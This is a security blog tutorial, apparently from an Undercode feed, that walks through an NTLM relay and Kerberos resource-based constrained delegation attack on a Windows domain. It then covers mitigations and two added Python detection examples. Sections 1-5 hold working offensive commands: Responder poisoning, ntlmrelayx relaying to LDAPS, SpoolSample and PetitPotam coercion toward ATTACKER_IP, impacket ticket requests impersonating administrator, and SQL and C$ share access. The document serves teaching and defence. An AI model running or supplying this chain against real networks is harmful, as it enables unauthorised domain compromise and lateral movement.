The Kerberos RBCD Relay: How a Single Coerced Authentication Can Compromise Your Domain

Introduction:

A sophisticated attack chain combining NTLM Relay and Kerberos Resource-Based Constrained Delegation (RBCD) poses a significant threat to enterprise networks. This technique allows attackers to compromise high-value servers by relaying coerced authentication and manipulating delegation privileges, all without requiring credential theft.

Learning Objectives:

  • Understand the mechanics of NTLM relay attacks against LDAPS
  • Learn how to exploit the Printer Bug for authentication coercion
  • Master Kerberos RBCD configuration for privilege escalation

You Should Know:

1. Initial Attack Setup: Poisoning and Relay Services

This phase establishes the attacker’s listening services to capture and relay authentication attempts.

Verified Commands:

# Start Responder for LLMNR/NBT-NS poisoning
sudo responder -I eth0 -dwv

# Start ntlmrelayx.py for LDAPS relay with RBCD attack
ntlmrelayx.py -t ldaps://dc01.corp.local --delegate-access --rbcd-attack -wh attacker-wpad

Step-by-Step Guide:

Responder listens on the specified interface (eth0) for NetBIOS, LLMNR, and mDNS queries, responding with the attacker’s IP to poison name resolution. The `-dwv` flags enable DHCP, WPAD, and verbose logging. Simultaneously, `ntlmrelayx.py` establishes a relay server that forwards captured NTLM authentication to the domain controller’s LDAPS service. The `--delegate-access` and `--rbcd-attack` flags automate the RBCD exploitation process once authentication is relayed.

2. Authentication Coercion: Forcing the SQL Server to Authenticate

Force a machine account to authenticate to the attacker-controlled relay using the Printer Bug or similar coercion techniques.

Verified Commands:

# Coerce authentication using SpoolSample tool
SpoolSample.exe SQL01.corp.local ATTACKER_IP

# Alternative using PetitPotam
python3 PetitPotam.py -d corp.local -u user -p password ATTACKER_IP SQL01.corp.local

Step-by-Step Guide:

The SpoolSample tool exploits the Print Spooler service vulnerability by requesting the SQL server to connect to the attacker’s machine. When SQL01 attempts to connect, it performs NTLM authentication that gets captured by the relay service. The `SpoolSample.exe` takes the target server name and attacker IP as parameters, forcing the target to authenticate against the attacker’s listener.

3. RBCD Attack Automation: Weaponizing Relayed Authentication

The relayed LDAPS session is used to configure RBCD on the target computer object, which is what gives the attacker the ability to impersonate users to it.

Verified Commands:

# ntlmrelayx automatically performs these steps during --rbcd-attack:
#  1. Creates a new computer account (if not existing)
#  2. Sets msDS-AllowedToActOnBehalfOfOtherIdentity on target
#  3. Grants the new account delegation rights

# Manual verification of RBCD settings (PowerShell)
Get-ADComputer SQL01 -Properties msDS-AllowedToActOnBehalfOfOtherIdentity

Step-by-Step Guide:

Upon successful relay, `ntlmrelayx.py` automatically creates a new computer account (like FAKEMACHINE$) if one doesn’t exist, then modifies the target computer’s `msDS-AllowedToActOnBehalfOfOtherIdentity` attribute to grant this new account delegation privileges. This allows the attacker to impersonate any user to the SQL server service.
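The `msDS-AllowedToActOnBehalfOfOtherIdentity` attribute holds a binary security descriptor, so the raw value returned by `Get-ADComputer` is not readable on its own. The following is an added example (not code from the original post or from impacket) that decodes such a descriptor, lists every SID permitted to act on behalf of the computer, and compares them against an administrator-maintained allow list; the sample descriptor, its SIDs and the approved list are all constructed.

```python
import struct

# Constructed sample value for msDS-AllowedToActOnBehalfOfOtherIdentity: a self-relative
# security descriptor whose DACL holds two ACCESS_ALLOWED ACEs (mask 0xF01FF, full control)
# for the invented machine-account SIDs S-1-5-21-1-2-3-1105 and S-1-5-21-1-2-3-2210.
SAMPLE_SD = bytes.fromhex(
    "01 00 04 80 00 00 00 00 00 00 00 00 00 00 00 00 14 00 00 00"  # SD header, DACL at offset 20
    "04 00 50 00 02 00 00 00"                                        # ACL header: 80 bytes, 2 ACEs
    "00 00 24 00 FF 01 0F 00"                                        # ACE 1: allowed, 36 bytes, mask
    "01 05 00 00 00 00 00 05 15 00 00 00 01 00 00 00 02 00 00 00 03 00 00 00 51 04 00 00"
    "00 00 24 00 FF 01 0F 00"                                        # ACE 2: allowed, 36 bytes, mask
    "01 05 00 00 00 00 00 05 15 00 00 00 01 00 00 00 02 00 00 00 03 00 00 00 A2 08 00 00"
)

SE_DACL_PRESENT = 0x0004
ACE_TYPE_NAMES = {0x00: "ACCESS_ALLOWED", 0x01: "ACCESS_DENIED",
                  0x05: "ACCESS_ALLOWED_OBJECT", 0x06: "ACCESS_DENIED_OBJECT"}

def parse_sid(buf, off):
    """Decode a binary SID at buf[off] into its S-1-... string form."""
    revision, sub_count = buf[off], buf[off + 1]
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % sub_count, buf, off + 8)
    return "S-%d-%d-%s" % (revision, authority, "-".join(map(str, subs)))

def parse_rbcd_descriptor(sd):
    """Return [(ace_type_name, access_mask, sid)] for every ACE in the descriptor's DACL."""
    revision, _, control, _, _, _, dacl_off = struct.unpack_from("<BBHIIII", sd, 0)
    if revision != 1:
        raise ValueError("unsupported security descriptor revision %d" % revision)
    if not control & SE_DACL_PRESENT or dacl_off == 0:
        return []  # no DACL: nobody may act on behalf of this computer
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", sd, dacl_off)
    off, entries = dacl_off + 8, []
    for _ in range(ace_count):
        ace_type, _, ace_size = struct.unpack_from("<BBH", sd, off)
        mask, = struct.unpack_from("<I", sd, off + 4)
        sid_off = off + 8
        if ace_type in (0x05, 0x06):  # object ACEs carry optional GUIDs before the SID
            obj_flags, = struct.unpack_from("<I", sd, off + 8)
            sid_off = off + 12 + 16 * (obj_flags & 1) + 16 * ((obj_flags >> 1) & 1)
        entries.append((ACE_TYPE_NAMES.get(ace_type, hex(ace_type)), mask, parse_sid(sd, sid_off)))
        off += ace_size
    return entries

def unexpected_delegators(sd, approved_sids):
    """SIDs granted delegation that are not on the (assumed) administrator allow list."""
    return sorted({sid for name, _, sid in parse_rbcd_descriptor(sd)
                   if name.startswith("ACCESS_ALLOWED") and sid not in approved_sids})

if __name__ == "__main__":
    for entry in parse_rbcd_descriptor(SAMPLE_SD):
        print("%s mask=0x%X sid=%s" % entry)
    print("unexpected:", unexpected_delegators(SAMPLE_SD, {"S-1-5-21-1-2-3-1105"}))
```

Any SID the parser reports that is not an account you deliberately allowed to delegate to that computer is a finding; an empty result (no DACL) is the normal state for most servers.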

4. Kerberos Ticket Acquisition: S4U2Proxy Exploitation

Leverage the configured RBCD to obtain service tickets for privileged access.

Verified Commands:

# Get a TGT for the fake computer account
getTGT.py -dc-ip dc01.corp.local 'CORP.LOCAL/FAKEMACHINE$:Password123'

# Perform S4U2Proxy to get service ticket for SQL service
getST.py -dc-ip dc01.corp.local -spn MSSQLSvc/SQL01.corp.local:1433 -impersonate administrator -altservice cifs/SQL01.corp.local 'CORP.LOCAL/FAKEMACHINE$:Password123'

Step-by-Step Guide:

After setting up RBCD, use `getTGT.py` to obtain a Ticket Granting Ticket for the compromised computer account. Then `getST.py` performs the Service-for-User-to-Proxy (S4U2proxy) extension, requesting a service ticket for the SQL service while impersonating the administrator account. The `-altservice` flag can request tickets for other services like CIFS for file share access.

5. Lateral Movement: Utilizing the Service Ticket

Use the acquired Kerberos ticket to access the target service with elevated privileges.

Verified Commands:

# Set the Kerberos ticket for use
export KRB5CCNAME=administrator.ccache

# Connect to SQL Server using the ticket
python3 mssqlclient.py -k SQL01.corp.local -no-pass

# Alternative for SMB access
smbclient.py -k -no-pass //SQL01.corp.local/C$

Step-by-Step Guide:

The `KRB5CCNAME` environment variable tells Kerberos tools to use the cached ticket. `mssqlclient.py` with `-k` flag uses Kerberos authentication without requiring a password, establishing a database connection as the impersonated administrator. Similarly, `smbclient.py` can access file shares using the same authentication method.

6. Mitigation: Preventing NTLM Relay Attacks

Implement defensive measures to break the attack chain.

Verified Commands:

# Disable LLMNR via GPO
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient" /v EnableMulticast /t REG_DWORD /d 0 /f

# Disable NTLM authentication where possible
# Enable SMB signing
reg add "HKLM\SYSTEM\CurrentControlSet\Services\LanManServer\Parameters" /v requiresecuritysignature /t REG_DWORD /d 1 /f

Step-by-Step Guide:

Disabling LLMNR through Group Policy or registry modification prevents name resolution poisoning. Enabling SMB signing (registry value requiresecuritysignature) ensures SMB communications are signed, making them unsuitable for relay. Additionally, disabling NTLM in favor of Kerberos and implementing EPA (Extended Protection for Authentication) for LDAPS prevents credential relay.

7. Detection: Identifying RBCD Attacks

Monitor for suspicious RBCD modifications and computer account creation.

Verified Commands:

# PowerShell one-liner to list computers with RBCD configured
Get-ADComputer -Filter * -Properties msDS-AllowedToActOnBehalfOfOtherIdentity | Where-Object {$_.'msDS-AllowedToActOnBehalfOfOtherIdentity'}

# Detect new computer account creation
Get-ADComputer -Filter {Created -gt (Get-Date).AddDays(-1)} -Properties Created,OperatingSystem

Step-by-Step Guide:

Regularly audit RBCD configurations using PowerShell to identify computers with delegation permissions. Monitor Event ID 4741 for computer account creation and Event ID 4735 for security descriptor modifications in Windows Security logs. Implement alerts for unexpected RBCD changes, particularly those involving recently created computer accounts.
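Added example, not from the original post: a correlation routine over constructed sample Security log events that flags every write to `msDS-AllowedToActOnBehalfOfOtherIdentity` (Event ID 5136, directory service object modified) and escalates when the delegated SID belongs to a computer account created shortly before (Event ID 4741) or when the target computer's own account wrote the attribute, which is what a relayed machine authentication looks like. Field names follow the 4741/5136 event data; the account names, SIDs and timestamps are invented.

```python
import re
from datetime import datetime, timedelta

RBCD_ATTR = "msDS-AllowedToActOnBehalfOfOtherIdentity"
SID_RE = re.compile(r"S-1-5-21(?:-\d+)+")

# Constructed sample events shaped like the 4741 / 5136 event data (invented names,
# SIDs and timestamps; the attribute value is shown in SDDL form as 5136 renders it).
SAMPLE_EVENTS = [
    {"EventID": 4741, "TimeCreated": "2024-05-01T10:02:11", "SubjectUserName": "SQL01$",
     "TargetUserName": "FAKEMACHINE$", "TargetSid": "S-1-5-21-1-2-3-2210"},
    {"EventID": 5136, "TimeCreated": "2024-05-01T10:02:13", "SubjectUserName": "SQL01$",
     "ObjectDN": "CN=SQL01,OU=Servers,DC=corp,DC=local",
     "AttributeLDAPDisplayName": RBCD_ATTR, "OperationType": "%%14674",  # value added
     "AttributeValue": "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1-2-3-2210)"},
    {"EventID": 5136, "TimeCreated": "2024-05-01T11:30:00", "SubjectUserName": "admin.ops",
     "ObjectDN": "CN=WEB01,OU=Servers,DC=corp,DC=local",
     "AttributeLDAPDisplayName": RBCD_ATTR, "OperationType": "%%14674",
     "AttributeValue": "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1-2-3-1105)"},
]

def detect_rbcd_abuse(events, lookback=timedelta(hours=24)):
    """Alert on every RBCD attribute write; escalate on fresh accounts or self-modification."""
    created = {}  # SID -> (account name, creation time), from 4741 events
    for ev in events:
        if ev["EventID"] == 4741:
            created[ev["TargetSid"]] = (ev["TargetUserName"], datetime.fromisoformat(ev["TimeCreated"]))
    alerts = []
    for ev in events:
        if ev["EventID"] != 5136 or ev.get("AttributeLDAPDisplayName") != RBCD_ATTR:
            continue
        when = datetime.fromisoformat(ev["TimeCreated"])
        sids = SID_RE.findall(ev.get("AttributeValue", ""))
        # delegated SIDs that belong to computer accounts created within the lookback window
        fresh = [created[s][0] for s in sids if s in created and when - created[s][1] <= lookback]
        # the target computer writing its own attribute is the signature of relayed machine auth
        target_cn = ev["ObjectDN"].split(",")[0].split("=", 1)[1].upper()
        self_write = ev["SubjectUserName"].rstrip("$").upper() == target_cn
        alerts.append({"severity": "high" if fresh or self_write else "medium",
                       "target": ev["ObjectDN"], "changed_by": ev["SubjectUserName"],
                       "delegated_sids": sids, "new_accounts": fresh, "self_write": self_write})
    return alerts

if __name__ == "__main__":
    for alert in detect_rbcd_abuse(SAMPLE_EVENTS):
        print(alert)
```

Event 5136 only fires when a SACL audit policy for directory service changes is enabled on the domain controllers, so confirm that auditing is in place before relying on this rule.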

What Undercode Say:

  • This attack demonstrates that even without credential theft, relayed authentication can lead to full domain compromise through privilege escalation.
  • The combination of legacy protocol weaknesses and Kerberos delegation features creates a perfect storm for lateral movement.

The Kerberos RBCD relay attack represents a critical evolution in lateral movement techniques, leveraging built-in Windows features rather than software vulnerabilities. What makes this particularly dangerous is its reliance on legitimate functionality—NTLM authentication, LDAPS communications, and Kerberos delegation—making detection through traditional signature-based methods challenging. Organizations must prioritize architectural defenses including disabling unnecessary protocols, implementing comprehensive monitoring for delegation changes, and migrating entirely to Kerberos authentication where possible. The attack’s success hinges on the continued presence of NTLM in enterprise environments, underscoring the urgent need for complete NTLM deprecation.

Prediction:

As Microsoft continues to harden Kerberos and NTLM protocols, attackers will shift toward manipulating cloud-based identity systems and application delegation models. Similar RBCD-style attacks will emerge targeting Azure AD Connect, hybrid identity configurations, and service principal delegations in cloud environments. The underlying pattern of abusing legitimate delegation mechanisms will persist, requiring continuous monitoring of identity configuration changes across both on-premises and cloud infrastructures.

Reported By: Jason Ampoloquio – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅